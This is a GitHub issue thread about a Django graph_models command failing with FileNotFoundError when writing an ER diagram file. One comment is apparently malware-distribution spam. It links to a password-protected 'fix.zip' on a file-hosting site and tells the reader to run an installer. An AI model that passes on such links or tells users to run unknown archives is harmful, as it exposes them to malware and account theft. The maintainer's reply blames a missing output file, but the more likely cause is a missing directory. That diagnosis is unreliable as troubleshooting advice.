### ISSUE TITLE
More detailed description of creating the DB tables using the Pygraph Django Extensions

### ISSUE THREAD

**Issue by Nage-Sh** [joisemp/inventory-management-system#155]
I use the command by working in the directory of src folder and in the terminal i run the command as
python manage.py graph_models core -o src/apps/core/er_diagram.dot

But these commnads give the errors as

Traceback (most recent call last):
  File "/home/user/Desktop/inventory-management-system/src/manage.py", line 24, in <module>
    main()
  File "/home/user/Desktop/inventory-management-system/src/manage.py", line 20, in main
    execute_from_command_line(sys.argv)
  File "/home/user/myenv/lib/python3.10/site-packages/django/core/management/__init__.py", line 442, in execute_from_command_line
    utility.execute()
  File "/home/user/myenv/lib/python3.10/site-packages/django/core/management/__init__.py", line 436, in execute
    self.fetch_command(subcommand).run_from_argv(self.argv)
  File "/home/user/myenv/lib/python3.10/site-packages/django/core/management/base.py", line 413, in run_from_argv
    self.execute(*args, **cmd_options)
  File "/home/user/myenv/lib/python3.10/site-packages/django/core/management/base.py", line 459, in execute
    output = self.handle(*args, **options)
  File "/home/user/myenv/lib/python3.10/site-packages/django_extensions/management/utils.py", line 62, in inner
    ret = func(self, *args, **kwargs)
  File "/home/user/myenv/lib/python3.10/site-packages/django_extensions/management/commands/graph_models.py", line 281, in handle
    self.print_output(dotdata, outputfile)
  File "/home/user/myenv/lib/python3.10/site-packages/django_extensions/management/commands/graph_models.py", line 289, in print_output
    with open(output_file, 'wt') as dot_output_f:
FileNotFoundError: [Errno 2] No such file or directory: 'src/apps/core/er_diagram.dot'

I checked this not found error so ChatGPT suggested to donwload pydot library I did that but still the issue is persisting :(

**Comment by luozhengdong** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by joisemp** [comment]
`FileNotFoundError: [Errno 2] No such file or directory: 'src/apps/core/er_diagram.dot'`
I think error is because the file does not exist in the path. Make sure the file `er_diagram.dot` is in the correct folder `core`
